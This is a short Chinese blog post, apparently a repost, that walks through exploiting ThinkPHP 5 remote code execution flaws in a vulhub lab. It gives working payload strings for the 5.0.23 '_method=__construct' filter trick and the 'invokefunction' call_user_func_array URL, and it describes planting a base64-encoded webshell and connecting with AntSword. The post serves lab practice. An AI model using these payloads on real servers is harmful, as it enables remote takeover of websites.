thinkphp框架漏洞

yiyan • 2022年8月7日 pm5:34 • web开发技术 • 65 阅读

thinkphp5 5.0.23 远程代码执行漏洞

进入vulhub靶场，启动环境。访问http://ip:8080测试靶场是否正常启动

使用hcakbar工具，构造payload，构造完毕后点击Execute

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=

命令执行成功
使用phpinfo验证漏洞

写入一句话木马，一句话木马要进行base64编码

进入容器，查看木马文件是否写入

然后使用蚁剑连接

成功getshell

进入vulhub靶场。启动环境

http://192.168.116.166:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

代码执行成功说明存在远程代码执行漏洞

待更新

thinkphp框架漏洞

原文：https://www.cnblogs.com/pursue-security/p/15306776.html

以上是thinkphp框架漏洞的全部内容。

THE END

二维码

Linux shell脚本之json解析

3.3 weblogic界面安装

下一篇>>